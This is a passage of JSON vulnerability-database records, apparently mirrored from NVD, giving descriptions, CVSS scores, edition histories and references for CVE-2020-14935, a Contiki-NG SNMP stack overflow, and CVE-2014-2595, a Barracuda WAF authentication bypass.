return address from the function. As a result, the code execution path may be redirected to an address provided in the SNMP bulk get payload. If the target architecture uses common addressing space for program and data memory, it may also be possible to supply code in the SNMP request payload, and redirect the execution path to the remotely injected code, by modifying the function's return address.", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-08-20T12:30:45", "references": [], "rev": 2}, "score": {"modified": "2020-08-20T12:30:45", "rev": 2, "value": 2.0, "vector": "NONE"}}, "hash": "4921c70418f6bf6ec752473e1752a68817f57810ebeda140beed8a664766c23c", "hashmap": [{"hash": "038e97d519e2335378fc68e6ac0c9dd5", "key": "description"}, {"hash": "7023fa44f77c91f4bbf327b9e53bae01", "key": "href"}, {"hash": "0bc6fd7c973557ca85aace2aedf9a089", "key": "published"}, {"hash": "2fe34fd242636dd156ec64ebc79fcc58", "key": "modified"}, {"hash": "cd414680a1f7198694611720e80e992e", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "ebee258103519fe1d0e99f103020f695", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "1a1fd0d8d1bd658f323f5ed98068ae3e", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14935", "id": "CVE-2020-14935", "lastseen": "2020-08-20T12:30:45", "modified": "2020-08-19T13:04:00", "objectVersion": "1.3", "published": "2020-08-18T17:15:00", "references": ["https://drive.google.com/file/d/1qp3ZXaFRiR_imWg0lUbI7-D-hIT268EB/view?usp=sharing", "https://github.com/contiki-ng/contiki-ng/issues/1353"], "reporter": "cve@mitre.org", "title": "CVE-2020-14935", "type": "cve", "viewCount": 0}, "differentElements": ["cvss", "cvss2", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 1, "lastseen": "2020-08-20T12:30:45"}], "edition": 8, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "846d70bca5916c9b4ee5ab56713aeca3"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "b2240ad4dbd21a1566c74afb26b5fd11"}, {"key": "cpe23", "hash": "789b17dda516bc9d73eaa1788c0add66"}, {"key": "cpeConfiguration", "hash": "ecaeb09e4321202f6a4fbf9d2c287737"}, {"key": "cvelist", "hash": "1a1fd0d8d1bd658f323f5ed98068ae3e"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "ad35358d166de03a84a3a9280d95337a"}, {"key": "cwe", "hash": "661a69d232e07fc7aadb258325e71df8"}, {"key": "description", "hash": "038e97d519e2335378fc68e6ac0c9dd5"}, {"key": "extraReferences", "hash": "c6cebcae4b1ac3fc7051b068b9030649"}, {"key": "href", "hash": "7023fa44f77c91f4bbf327b9e53bae01"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "ce1a3bc1d546336624053ad9c08536a3"}, {"key": "published", "hash": "0bc6fd7c973557ca85aace2aedf9a089"}, {"key": "references", "hash": "cd414680a1f7198694611720e80e992e"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "ebee258103519fe1d0e99f103020f695"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "f25c62ad9dec8f71f1af7b8ef2ffa32155e2128b422744b18a837ac69fa33bdf", "viewCount": 7, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-23T01:09:34", "rev": 2}, "score": {"value": 2.0, "vector": "NONE", "modified": "2021-04-23T01:09:34", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/o:contiki-ng:contiki-ng:4.5"], "affectedSoftware": [{"cpeName": "contiki-ng:contiki-ng", "name": "contiki-ng", "operator": "le", "version": "4.5"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:contiki-ng:contiki-ng:4.5:*:*:*:*:*:*:*"], "cwe": ["CWE-787"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:contiki-ng:contiki-ng:4.5:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.5", "versionStartIncluding": "4.0", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://github.com/contiki-ng/contiki-ng/issues/1353", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://github.com/contiki-ng/contiki-ng/issues/1353"}, {"name": "https://drive.google.com/file/d/1qp3ZXaFRiR_imWg0lUbI7-D-hIT268EB/view?usp=sharing", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://drive.google.com/file/d/1qp3ZXaFRiR_imWg0lUbI7-D-hIT268EB/view?usp=sharing"}], "immutableFields": []}, {"bulletinFamily": "NVD", "hash": "6a0ace8cdb63863b470e6561269f441d83851201520bc6a55e7930a925c15e3a", "id": "CVE-2014-2595", "lastseen": "2021-04-22T23:44:08", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "cvelist": ["CVE-2014-2595"], "viewCount": 73, "modified": "2020-02-20T15:55:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "edition": 8, "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "history": [{"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-13T14:29:47", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-13T14:29:47", "value": 6.9, "vector": "NONE"}}, "hash": "0d148bb322c927927cf5c8adaba4daf0d811bf2bee4917f93ca62ca2f942333e", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "23075837e6c728c8f0077b2ae5d5ee7f", "key": "modified"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-13T14:29:47", "modified": "2020-02-12T13:07:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["cpe23", "cvss", "cvss2", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-13T14:29:47"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-02-12T14:27:29", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-12T14:27:29", "value": 6.9, "vector": "NONE"}}, "hash": "6ccf8f84237981876cda9914b348e4e11c8972875cdf630f59422732f1ea69ba", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-12T14:27:29", "modified": "2020-02-12T01:15:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["modified"], "edition": 2, "lastseen": "2020-02-12T14:27:29"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-10-03T12:01:15", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-10-03T12:01:15", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [], "hash": "65fabd8c3b92ccbba797b3dfba517234b9e0e8bc2464531f2cd64047dd457870", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-10-03T12:01:15", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 56}, "differentElements": ["extraReferences"], "edition": 6, "lastseen": "2020-10-03T12:01:15"}, {"bulletin": {"affectedSoftware": [{"name": "barracuda web_application_firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-02-21T13:06:26", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-02-21T13:06:26", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "4423bdd8d6936961112ee89e752cf7c866f443470052f4a4ac3529b4be6ae18f", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}, {"hash": "ee2d931efb4c4fa7a1a321df76c0b838", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-21T13:06:26", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 47}, "differentElements": ["cvss3", "affectedSoftware"], "edition": 4, "lastseen": "2020-02-21T13:06:26"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "enchantments": {"dependencies": {"modified": "2021-02-02T06:14:28", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2021-02-02T06:14:28", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "hash": "d6e72c33ebf3accfe25046812d0b1e7698f2d37c9159defa7c7bda26e2ab359b", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "073d5951cb97bd54baf9ef00e5950ef4", "key": "extraReferences"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "immutableFields": [], "lastseen": "2021-02-02T06:14:28", "modified": "2020-02-20T15:55:00", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 60}, "different_elements": ["cpeConfiguration"], "edition": 7, "lastseen": "2021-02-02T06:14:28"}], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13887", "SECURITYVULNS:DOC:31004"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127740"]}, {"type": "exploitdb", "idList": ["EDB-ID:39278"]}], "modified": "2021-04-22T23:44:08", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-04-22T23:44:08", "rev": 2}}, "type": "cve", "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a97b191a26cb922c0b82d26c5f04f4db"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "832b9c21b4589969549f63eb0724398c"}, {"key": "cpe23", "hash": "405ecfc0fb244283a2773863614145bf"}, {"key": "cpeConfiguration", "hash": "238f536d7ccbcb60d24ab76ed2548b8b"}, {"key": "cvelist", "hash": "afd8c4a8002c25596504fc1efc107886"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "ad35358d166de03a84a3a9280d95337a"}, {"key": "cwe", "hash": "86870277fcb3e3e121fe9e4f1f7c2b51"}, {"key": "description", "hash": 